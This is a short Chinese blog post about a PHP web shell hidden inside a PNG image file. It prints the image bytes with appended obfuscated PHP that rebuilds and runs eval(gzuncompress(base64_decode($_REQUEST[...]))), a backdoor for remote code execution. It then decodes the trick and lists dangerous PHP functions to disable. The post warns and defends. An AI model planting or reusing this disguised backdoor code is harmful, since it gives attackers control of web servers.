记一次图片木马

时间：2021-04-23 14:03:03

啥也不说了，直接上图片，哈

1 2 3 4 5 6 7 8 9 10 11 12 13

塒NG      IH@            鴄?      pHYs  ? ??   tEXtSoftware Snipaste]屋   IDAT檆`?   n @W?   IEND瓸`??= $b64 = "base64_decode"; $css=$b64("Q3JlYXRlX0Z1bmN0aW9u"); $pl = 'preg_replace'; $html = 'e'.'#html'.'v'.'a'.'l(gzunco'.'mpres'.'s(b'.'ase'.'64_de'.'code($_REQ'.'UE'.'ST["sex"])));'; $style=$css('',$pl("/#html/","",$html)); $style(); // 执行结果很严重 eval(gzuncompress(base64_decode($_REQUEST["sex"])));

看完上面代码吓一跳吧。防护还是时刻要做啊，把危险函数要禁用啊

建议禁用的函数：

disable_functions = system,exec,shell_exec,passthru,proc_open,proc_close, proc_get_status,checkdnsrr,getmxrr,getservbyname,getservbyport, syslog,popen,show_source,highlight_file,dl,socket_listen,socket_create,socket_bind,socket_accept, socket_connect, stream_socket_server, stream_socket_accept,stream_socket_client,ftp_connect, ftp_login,ftp_pasv,ftp_get,sys_getloadavg,disk_total_space, disk_free_space,posix_ctermid,posix_get_last_error,posix_getcwd, posix_getegid,posix_geteuid,posix_getgid, posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid, posix_getppid,posix_getpwnam,posix_getpwuid, posix_getrlimit, posix_getsid,posix_getuid,posix_isatty, posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid, posix_setpgid,posix_setsid,posix_setuid,posix_strerror,posix_times,posix_ttyname,posix_uname,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,

安全不容小视！